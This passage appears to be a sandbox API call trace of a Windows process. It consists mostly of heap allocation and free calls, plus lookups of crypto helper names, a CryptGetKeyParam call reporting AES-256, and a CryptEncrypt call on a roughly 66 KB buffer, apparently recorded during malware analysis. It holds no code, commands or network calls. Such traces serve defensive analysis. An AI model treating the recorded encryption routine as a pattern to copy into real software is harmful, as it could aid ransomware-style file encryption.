hHeap=0x1780000) returned 1 [0111.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0111.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0111.705] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0111.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0111.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0111.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0111.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0111.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0111.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0111.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0111.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0111.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0111.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0111.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0111.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0111.706] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e00 | out: hHeap=0x1780000) returned 1 [0111.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0111.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0111.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0111.706] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0111.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0111.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0111.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0111.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0111.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0111.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0111.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0111.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0111.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0111.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0111.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0111.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0111.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0111.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0111.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0111.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0111.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0111.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0111.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0111.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0111.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0111.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0111.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0111.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0111.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0111.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0111.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0111.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0111.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0111.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0111.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0111.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0111.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0111.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0111.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0111.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0111.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0111.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0111.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0111.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0111.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0111.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0111.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0111.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0111.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0111.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0111.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0111.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0111.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0111.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0111.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0111.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0111.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0111.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0111.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0111.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0111.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0111.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0111.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0111.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0111.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0111.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0111.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0111.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0111.708] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0111.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0111.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0111.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0111.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0111.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797048, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0111.709] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0111.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0111.710] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e2910, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2910*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0111.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0111.711] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0111.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0111.712] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0111.712] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0111.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0111.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0111.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0111.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0111.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0111.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0111.713] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0111.713] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.713] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0111.713] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.713] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0111.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca790, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0111.713] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x10430, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x10440) returned 1 [0111.713] CharLowerBuffW (in: lpsz="byte[66625]", 